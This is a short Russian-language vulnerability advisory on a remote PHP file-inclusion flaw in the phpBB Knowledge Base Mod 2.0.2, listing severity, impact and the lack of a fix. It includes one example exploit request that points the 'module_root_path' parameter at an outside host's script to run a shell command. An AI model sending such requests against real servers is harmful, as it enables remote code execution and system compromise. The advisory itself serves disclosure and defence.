PHP-инклюдинг в phpBB Knowledge Base Mod

Дата публикации:
02.05.2006
Дата изменения:
03.05.2006
Всего просмотров:
2632
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Knowledge Base Mod 2.x (модуль к phpBB)
Уязвимые версии: Knowledge Base Mod (модуль для phpBB) 2.0.2, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "module_root_path" в сценарии /includes/kb_constants.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

/includes/kb_constants.php?module_root_path=http://yourhost/cmd.gif?cmd=ls

URL производителя: www.phpbb2.de/dload.php?action=file&file_id=538

Решение: Способов устранения уязвимости не существует в настоящее время.

или введите имя

CAPTCHA